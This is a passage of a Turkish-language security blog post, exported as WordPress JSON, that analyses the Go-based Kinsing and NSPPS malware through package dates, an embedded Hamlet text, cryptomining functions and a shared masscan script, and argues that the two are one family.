{"id":8761,"date":"2024-12-21T13:00:28","date_gmt":"2024-12-21T10:00:28","guid":{"rendered":"https:\/\/sunucucozumleri.com\/blog\/?p=8761"},"modified":"2024-12-21T13:00:28","modified_gmt":"2024-12-21T10:00:28","slug":"kinsing-iki-yuzu-olan-kotu-amacli-yazilim","status":"publish","type":"post","link":"https:\/\/sunucucozumleri.com\/blog\/kinsing-iki-yuzu-olan-kotu-amacli-yazilim\/","title":{"rendered":"Kinsing: \u0130ki Y\u00fcz\u00fc Olan K\u00f6t\u00fc Ama\u00e7l\u0131 Yaz\u0131l\u0131m"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Makale \u0130\u00e7eri\u011fi<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"\u0130\u00e7indekiler Tablosunu A\u00e7\/Kapat\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/sunucucozumleri.com\/blog\/kinsing-iki-yuzu-olan-kotu-amacli-yazilim\/#Kinsing_Nedir\" >Kinsing Nedir?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/sunucucozumleri.com\/blog\/kinsing-iki-yuzu-olan-kotu-amacli-yazilim\/#NSPPS_ve_Kinsing_Arasindaki_Farklar\" >NSPPS ve Kinsing Aras\u0131ndaki Farklar<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/sunucucozumleri.com\/blog\/kinsing-iki-yuzu-olan-kotu-amacli-yazilim\/#NSPPS_ve_Kinsing_%E2%80%93_Benzerlikler\" >NSPPS ve Kinsing \u2013 Benzerlikler<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/sunucucozumleri.com\/blog\/kinsing-iki-yuzu-olan-kotu-amacli-yazilim\/#Cozum\" >\u00c7\u00f6z\u00fcm<\/a><\/li><\/ul><\/nav><\/div>\n<h3><span class=\"ez-toc-section\" id=\"Kinsing_Nedir\"><\/span>Kinsing Nedir?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Son zamanlarda, bulut ve konteyner tehditlerinin geli\u015fen alan\u0131n\u0131 ara\u015ft\u0131rmakla me\u015fgul\u00fcz. Neden buraya odaklanal\u0131m? \u00c7\u00fcnk\u00fc, bu teknoloji daha pop\u00fcler hale geldik\u00e7e ve geli\u015fmeye devam ettik\u00e7e, sald\u0131rganlar da bu sistemlere s\u0131zmak i\u00e7in tekniklerini geli\u015ftiriyorlar.<\/p>\n<p>Ara\u015ft\u0131rmam\u0131z s\u0131ras\u0131nda, Redis\u00a0ve\u00a0SaltStack\u00a0dahil olmak \u00fczere birden fazla sald\u0131r\u0131 kampanyas\u0131nda yer alan bir ELF k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131 olan\u00a0<strong>Kinsing ile<\/strong>\u00a0kar\u015f\u0131la\u015ft\u0131k\u00a0. Kinsing, son birka\u00e7 y\u0131ld\u0131r k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m yazarlar\u0131 aras\u0131nda pop\u00fclerli\u011fi h\u0131zla artan nispeten yeni bir dil olan Go dilinde, di\u011fer ad\u0131yla Golang&#8217;da yaz\u0131lm\u0131\u015ft\u0131r.<\/p>\n<p><strong>Birka\u00e7 Kinsing \u00f6rne\u011fini analiz ederken, NSPPS<\/strong>\u00a0adl\u0131 ba\u015fka bir k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m ailesiyle ilgili baz\u0131 eserler buldu\u011fumuza \u015fa\u015f\u0131rd\u0131k\u00a0. \u0130lk ba\u015fta, bu bulgular\u0131 a\u00e7\u0131klayabilecek birka\u00e7 fikir bulduk &#8211; belki de ortak par\u00e7alar her iki aile taraf\u0131ndan da kullan\u0131lan a\u00e7\u0131k kaynakl\u0131 ara\u00e7lard\u0131r veya belki bir grup di\u011ferini taklit ediyordur. Ara\u015ft\u0131rmam\u0131z\u0131n g\u00f6sterdi\u011fi \u015fey, iki ailenin asl\u0131nda ayn\u0131 aile oldu\u011fu ve g\u00fcvenlik ara\u015ft\u0131rma toplulu\u011fu taraf\u0131ndan kendisine verilen iki farkl\u0131 isim oldu\u011fudur.<\/p>\n<p>Bu blog yaz\u0131m\u0131zda Kinsing ile NSPPS aras\u0131ndaki farkl\u0131l\u0131klar\u0131 ve benzerlikleri inceleyecek, bulgular\u0131m\u0131z\u0131 sunacak ve bunlar\u0131n ayn\u0131 k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m ailesi oldu\u011fu sonucuna nas\u0131l ve neden vard\u0131\u011f\u0131m\u0131z\u0131 a\u00e7\u0131klayaca\u011f\u0131z.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"NSPPS_ve_Kinsing_Arasindaki_Farklar\"><\/span><strong>NSPPS ve Kinsing Aras\u0131ndaki Farklar<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Ara\u015ft\u0131rman\u0131n ba\u015f\u0131nda, Kinsing ve NSPPS&#8217;yi tespit etmek i\u00e7in g\u00fcvenlik firmalar\u0131 taraf\u0131ndan yay\u0131nlanan t\u00fcm IOC&#8217;leri toplad\u0131k, kendi YARA kurallar\u0131m\u0131z\u0131 yazd\u0131k ve sonu\u00e7lar\u0131 toplad\u0131k. Biraz temizlikten sonra, odakland\u0131\u011f\u0131m\u0131z birka\u00e7 d\u00fczine \u00f6rne\u011fimiz oldu.<\/p>\n<p>Kinsing ve NSPPS&#8217;nin 27 \u00f6rne\u011finden yaln\u0131zca biri NSPPS olarak yay\u0131nland\u0131 &#8211; 5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6. Di\u011fer 26 \u00f6rnek Kinsing olarak s\u0131n\u0131fland\u0131r\u0131ld\u0131.<\/p>\n<p>NSPPS \u00f6rne\u011fini Kinsing \u00f6rneklerinden ay\u0131ran baz\u0131 \u00f6nemli eserler bulduk.<\/p>\n<p><strong><em>S\u00fcr\u00fcmler ve Tarihler: Say\u0131lar\u0131 Kar\u015f\u0131la\u015ft\u0131ral\u0131m<\/em><\/strong><\/p>\n<p>\u00d6ncelikle ve en \u00f6nemlisi, NSPPS \u00f6rne\u011fi Golang 1.9.7 s\u00fcr\u00fcm\u00fc kullan\u0131larak yaz\u0131lm\u0131\u015ft\u0131r:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8762\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1.png\" alt=\"\" width=\"970\" height=\"92\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1.png 970w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1-300x28.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1-768x73.png 768w\" sizes=\"(max-width: 970px) 100vw, 970px\" \/><\/p>\n<p>Kinsing \u00f6rnekleri Golang 1.13.4 veya 1.13.6 s\u00fcr\u00fcm\u00fc kullan\u0131larak yaz\u0131lm\u0131\u015ft\u0131r:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8763\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-2.webp\" alt=\"\" width=\"521\" height=\"46\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-2.webp 521w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-2-300x26.webp 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8764\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-3.webp\" alt=\"\" width=\"521\" height=\"48\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-3.webp 521w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-3-300x28.webp 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/p>\n<p>Bu fark, her bir \u00f6rne\u011fin derleme zaman\u0131n\u0131n farkl\u0131 oldu\u011fu anlam\u0131na gelebilir; zira en son s\u00fcr\u00fcm\u00fc kullanmak mant\u0131kl\u0131 olmakla birlikte gerekli de\u011fildir.<\/p>\n<p>\u00d6rneklerin derleme zaman damgas\u0131n\u0131 belirlemek, iki aileyi ay\u0131rt etme s\u00fcreci i\u00e7in \u00f6nemliydi. Ne yaz\u0131k ki, Windows PE dosyalar\u0131n\u0131n aksine, Linux ELF dosyalar\u0131 tasar\u0131m gere\u011fi bir derleme zaman damgas\u0131na sahip de\u011fildir ve bu da bize eksik bir bilgi par\u00e7as\u0131 daha b\u0131rakmaktad\u0131r. Neyse ki, Golang k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131 (veya genel olarak konu\u015fursak &#8211; Golang ikili dosyalar\u0131) varsay\u0131lan olarak genellikle bir s\u00fcr\u00fcm numaras\u0131 i\u00e7eren Github paketlerini kullan\u0131r. Bu, kulland\u0131\u011f\u0131 en yeni paketin son yay\u0131n tarihini hesaplayarak k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m derlemesi i\u00e7in asgari bir tarih belirlemeye yard\u0131mc\u0131 olur.<\/p>\n<p>A\u015fa\u011f\u0131da Kinsing \u00f6rnekleri i\u00e7in ortak paketlerin k\u0131smi bir listesi ve yay\u0131n tarihleri \u200b\u200byer almaktad\u0131r:<\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" style=\"height: 341px;\" width=\"801\">\n<thead>\n<tr>\n<th width=\"33%\">Package<\/th>\n<th width=\"33%\">Version<\/th>\n<th width=\"33%\">Release Date<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>go-resty\/resty<\/td>\n<td>2.1.0<\/td>\n<td>10\/10\/2019<\/td>\n<\/tr>\n<tr>\n<td>google\/btree<\/td>\n<td>1.0.0<\/td>\n<td>13\/08\/2018<\/td>\n<\/tr>\n<tr>\n<td>kelseyhightower\/envconfig<\/td>\n<td>1.4.0<\/td>\n<td>24\/05\/2019<\/td>\n<\/tr>\n<tr>\n<td>markbates\/pkger<\/td>\n<td>0.12.8<\/td>\n<td>21\/11\/2019<\/td>\n<\/tr>\n<tr>\n<td>paulbellamy\/ratecounter<\/td>\n<td>0.2.0<\/td>\n<td>19\/07\/2017<\/td>\n<\/tr>\n<tr>\n<td>peterbourgon\/diskv<\/td>\n<td>2.0.1<\/td>\n<td>14\/08\/2017<\/td>\n<\/tr>\n<tr>\n<td>shirou\/gopsutil<\/td>\n<td>2.19.10<\/td>\n<td>19\/10\/2019<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u201c\u00a0<a class=\"ext-url\" href=\"https:\/\/github.com\/markbates\/pkger\" target=\"_blank\" rel=\"noopener nofollow\" data-internal=\"false\">pkger<\/a>\u00a0\u201d\u0131n en son yay\u0131n tarihi:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8765\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-1024x317.webp\" alt=\"\" width=\"1024\" height=\"317\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-1024x317.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-300x93.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-768x238.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-1536x476.webp 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4.webp 1658w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Dolay\u0131s\u0131yla 26 Kinsing \u00f6rne\u011finin tamam\u0131n\u0131n 21 Kas\u0131m 2019&#8217;dan sonra derlendi\u011fi sonucuna varabiliriz.<\/p>\n<p>A\u015fa\u011f\u0131da NSPPS&#8217;nin kulland\u0131\u011f\u0131 paketlerin k\u0131smi bir listesi bulunmaktad\u0131r:<\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" width=\"100%\">\n<thead>\n<tr>\n<th width=\"33%\">Package<\/th>\n<th width=\"33%\">Version<\/th>\n<th width=\"33%\">Release Date<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>google\/btree<\/td>\n<td>1.0.0<\/td>\n<td>13\/08\/2018<\/td>\n<\/tr>\n<tr>\n<td>go-resty\/resty<\/td>\n<td>2.1.0<\/td>\n<td>10\/10\/2019<\/td>\n<\/tr>\n<tr>\n<td>kelseyhightower\/envconfig<\/td>\n<td>1.4.0<\/td>\n<td>25\/05\/2019<\/td>\n<\/tr>\n<tr>\n<td>paulbellamy\/ratecounter<\/td>\n<td>0.2.0<\/td>\n<td>19\/07\/2017<\/td>\n<\/tr>\n<tr>\n<td>peterbourgon\/diskv<\/td>\n<td>3.0.0<\/td>\n<td>25\/04\/201<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>G\u00f6r\u00fcld\u00fc\u011f\u00fc gibi, NSPPS i\u00e7in m\u00fcmk\u00fcn olan en erken derleme tarihi 10 Ekim 2019&#8217;dur. Bu, Kinsing&#8217;den \u00f6nce derlendi\u011fini d\u00fc\u015f\u00fcnd\u00fcrmektedir, ancak durum b\u00f6yle olmayabilir.<\/p>\n<p><strong><em>Olmak ya da Olmamak: \u0130\u015fte Fark Bu<\/em><\/strong><\/p>\n<p>Kinsing \u00f6rneklerinde bulunan ilgin\u00e7 bir eser, a\u015fa\u011f\u0131da g\u00f6r\u00fcld\u00fc\u011f\u00fc gibi William Shakespeare&#8217;in Hamlet oyununun tam metninin bulunmas\u0131d\u0131r:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8766\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-1024x706.webp\" alt=\"\" width=\"1024\" height=\"706\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-1024x706.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-300x207.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-768x530.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-1536x1060.webp 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5.webp 1638w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Bu kan\u0131t daha \u00f6nce birka\u00e7 ara\u015ft\u0131rmac\u0131 taraf\u0131ndan yay\u0131nlanm\u0131\u015ft\u0131. Yayg\u0131n varsay\u0131m, bunun\u00a0statik alg\u0131lama motorlar\u0131 taraf\u0131ndan alg\u0131lanmay\u0131 \u00f6nlemek\u00a0veya ayn\u0131 amaca hizmet eden\u00a0ikili boyutu art\u0131rmak\u00a0i\u00e7in yap\u0131ld\u0131\u011f\u0131d\u0131r . Bu eser NSPPS \u00f6rneklerinde mevcut de\u011fildir.<\/p>\n<p>\u0130lk bak\u0131\u015fta \u00f6nemli bir fark gibi g\u00f6r\u00fcn\u00fcyor &#8211; belki Kinsing yazarlar\u0131 k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131mlar\u0131n\u0131 gizlemeye NSPPS yazarlar\u0131ndan daha fazla dikkat etmi\u015f olabilir. Ancak biraz daha derine indi\u011fimizde ba\u015fka bir a\u00e7\u0131klama bulduk. Hamlet oyununun Kinsing i\u00e7indeki yerini kontrol etti\u011fimizde, ikili dosyan\u0131n di\u011fer dizeleri aras\u0131nda veri b\u00f6l\u00fcm\u00fcnde var olmaktan ziyade, buna dair baz\u0131 referanslar var:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8767\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-1024x152.webp\" alt=\"\" width=\"1024\" height=\"152\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-1024x152.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-300x45.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-768x114.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6.webp 1510w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Daha sonra ilgili fonksiyona bakal\u0131m:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8768\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-1024x499.png\" alt=\"\" width=\"1024\" height=\"499\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-1024x499.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-300x146.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-768x374.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-1536x749.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Bu fonksiyonun ad\u0131\u00a0<span class=\"cyb-inline-code-labs\">github.com.markbates.pkger.internal.takeon.github.com.markbates.hepa.filters<\/span>\u00a0olup anlam\u0131 \u015fudur: \u201c\u00a0<span class=\"cyb-inline-code-labs\">markbates<\/span>\u00a0taraf\u0131ndan yaz\u0131lan ve Github&#8217;a y\u00fcklenen\u00a0<span class=\"cyb-inline-code-labs\">hepa paketindeki\u00a0<\/span><span class=\"cyb-inline-code-labs\">filtreler<\/span>\u00a0dosyas\u0131nda bulunan, fakat asl\u0131nda\u00a0<span class=\"cyb-inline-code-labs\">markbates taraf\u0131ndan yaz\u0131lan ve Github&#8217;a y\u00fcklenen\u00a0<\/span><span class=\"cyb-inline-code-labs\">pkger<\/span>\u00a0paketine\u00a0de\u00a0g\u00f6m\u00fclen bir fonksiyon.\u201d<\/p>\n<p>Ve beklendi\u011fi gibi:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8769\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-8.png\" alt=\"\" width=\"768\" height=\"240\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-8.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-8-300x94.png 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p><a class=\"ext-url\" href=\"https:\/\/github.com\/markbates\/pkger\/tree\/v0.12.8\" target=\"_blank\" rel=\"noopener nofollow\" data-internal=\"false\">(Ve tabii ki 0.12.8<\/a>\u00a0s\u00fcr\u00fcm\u00fcn\u00fc kontrol etmeyi unutmay\u0131n\u00a0, \u00e7\u00fcnk\u00fc bu par\u00e7a o tarihten sonra yazar taraf\u0131ndan kald\u0131r\u0131ld\u0131.)<\/p>\n<p>Hepa paketini analiz ederken, Hamlet&#8217;in amac\u0131n\u0131 anlad\u0131k &#8211; bir tamponun gizli k\u0131s\u0131mlar\u0131n\u0131 gizlemek i\u00e7in kullan\u0131l\u0131r. \u00d6rne\u011fin, bilgeli\u011finizi d\u00fcnyayla payla\u015fmak i\u00e7in yararl\u0131 AWS beti\u011finizi GitHub&#8217;a y\u00fcklemek istedi\u011finizi varsayal\u0131m, ancak daha sonra gizli AWS anahtarlar\u0131n\u0131z\u0131 i\u00e7eren t\u00fcm k\u0131s\u0131mlar\u0131 kald\u0131r\u0131p kald\u0131rmad\u0131\u011f\u0131n\u0131zdan emin de\u011filsiniz. Bu durumda, parolayla ilgili bilgileri otomatik olarak arayan ve kald\u0131ran bir ara\u00e7 kullanabilirsiniz. Jetonunuzu Hamlet&#8217;ten g\u00fc\u00e7l\u00fc bir ifadeyle de\u011fi\u015ftirmenin ne kadar harika olaca\u011f\u0131n\u0131 d\u00fc\u015f\u00fcn\u00fcn!<\/p>\n<p>\u015eimdi, muhtemelen fark etti\u011finiz gibi, pkger paketi NSPPS&#8217;nin paketlerinden biri olarak listelenmemi\u015f, dolay\u0131s\u0131yla Hamlet&#8217;in NSPPS&#8217;de yer almamas\u0131 yaln\u0131zca kripto madencili\u011fi faaliyetinin bir par\u00e7as\u0131 olarak kullan\u0131lan bu paketin yoklu\u011fuyla ilgilidir (\u00a0<em>bunun hakk\u0131nda daha sonra daha fazla bilgi verece\u011fiz).<\/em><\/p>\n<p>Sonu\u00e7 olarak, Hamlet b\u00fcy\u00fck ve anlaml\u0131 bir oyun olarak kabul edilse de (veya kabul edilmese de?), kar\u015f\u0131la\u015ft\u0131rmam\u0131zda anlaml\u0131 bir kan\u0131t de\u011fildir. Aksine, di\u011fer daha \u00f6nemli unsurlar\u0131n bir yan etkisidir.<\/p>\n<p><strong><em>Para nerede?<\/em><\/strong><\/p>\n<p>Kinsing \u00f6rnekleriyle ilgili raporlar\u0131 okudu\u011funuzda, Kinsing&#8217;in amac\u0131n\u0131n Aqua Security&#8217;den al\u0131nan bu diyagramda g\u00f6sterildi\u011fi gibi\u00a0<span class=\"cyb-inline-code-labs\">kdevtmpfsi<\/span>\u00a0adl\u0131 bir cryptoMiner y\u00fcklemek oldu\u011fu a\u00e7\u0131kt\u0131r :<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8770\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-9.webp\" alt=\"\" width=\"768\" height=\"476\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-9.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-9-300x186.webp 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>Kinsing \u00f6rneklerinin koduna bakt\u0131\u011f\u0131m\u0131zda, kripto madencili\u011fi aktivitesiyle ilgili bir\u00e7ok fonksiyon buluyoruz:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8771\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-10.webp\" alt=\"\" width=\"768\" height=\"358\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-10.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-10-300x140.webp 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>Bu fonksiyonlar kodun ger\u00e7ek main fonksiyonu olan\u00a0<span class=\"cyb-inline-code-labs\">main.main&#8217;den<\/span>\u00a0\u00e7a\u011fr\u0131l\u0131r .<\/p>\n<p>NSPPS \u00f6rne\u011finde, kontroller ve eylemler dahil olmak \u00fczere kripto madencili\u011fi faaliyetiyle ilgili t\u00fcm kodlar eksiktir. Bu, iki ara\u00e7 aras\u0131ndaki \u00f6nemli bir farkt\u0131r: kripto madencili\u011fi i\u015flevi, Kinsing k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131n\u0131n amac\u0131n\u0131n kurban sisteme bir kripto madenci kurmak oldu\u011funu \u00f6ne s\u00fcrerken, NSPPS k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131n\u0131n amac\u0131 RAT i\u015flevi sa\u011flamakt\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"NSPPS_ve_Kinsing_%E2%80%93_Benzerlikler\"><\/span><strong>NSPPS ve Kinsing \u2013 Benzerlikler<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Kinsing ve NSPPS aras\u0131nda onlar\u0131 tamamen farkl\u0131 k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m aileleri gibi g\u00f6steren birka\u00e7 fark bulmam\u0131za ra\u011fmen, k\u00fc\u00e7\u00fck bir ses bize ayn\u0131 aileden olduklar\u0131n\u0131 kan\u0131tlayaca\u011f\u0131m\u0131za s\u00f6z verdi\u011fimizi hat\u0131rlat\u0131yor. A\u015fa\u011f\u0131da bu benzerliklerden baz\u0131lar\u0131 yer almaktad\u0131r.<\/p>\n<p><strong><em>Herkes \u0130\u00e7in Masscan<\/em><\/strong><\/p>\n<p>T\u00fcm \u00f6rneklerde kendini tekrarlayan bir \u00f6zellik, Masscan\u00a0arac\u0131n\u0131n kullan\u0131m\u0131d\u0131r\u00a0&#8211; daha spesifik olarak, Masscan&#8217;\u0131n ayn\u0131 \u015fekilde kullan\u0131lmas\u0131. Hem Kinsing hem de NSPPS k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131mlar\u0131,\u00a0<span class=\"cyb-inline-code-labs\">main.masscan<\/span>\u00a0i\u015flevi taraf\u0131ndan y\u00fcr\u00fct\u00fclen\u00a0<span class=\"cyb-inline-code-labs\">firewire.sh<\/span>\u00a0adl\u0131 g\u00f6m\u00fcl\u00fc, a\u00e7\u0131k metinli bir bash beti\u011fi i\u00e7erir . Bu i\u015flev beti\u011fi diske yazar, modunu y\u00fcr\u00fct\u00fclebilir olarak de\u011fi\u015ftirir ve ard\u0131ndan \u00e7al\u0131\u015ft\u0131r\u0131r.<\/p>\n<p><span class=\"cyb-inline-code-labs\"><strong>Ek B&#8217;de<\/strong><\/span><span class=\"cyb-inline-code-labs\">\u00a0firewire.sh<\/span>\u00a0beti\u011finin\u00a0tamam\u0131n\u0131 g\u00f6r\u00fcn\u00a0.<\/p>\n<p><span class=\"cyb-inline-code-labs\">Bunu i\u015fleyen main.masscan&#8217;deki<\/span>\u00a0kod\u00a0\u015fu \u015fekildedir:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8772\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-1024x135.webp\" alt=\"\" width=\"1024\" height=\"135\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-1024x135.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-300x39.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-768x101.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-1536x202.webp 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11.webp 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p><span class=\"cyb-inline-code-labs\">NSPPS i\u00e7in main.masscan<\/span>\u00a0fonksiyonu biraz farkl\u0131d\u0131r (muhtemelen yukar\u0131da belirtilen derleyici fark\u0131ndan dolay\u0131) ancak\u00a0Kinsing&#8217;de 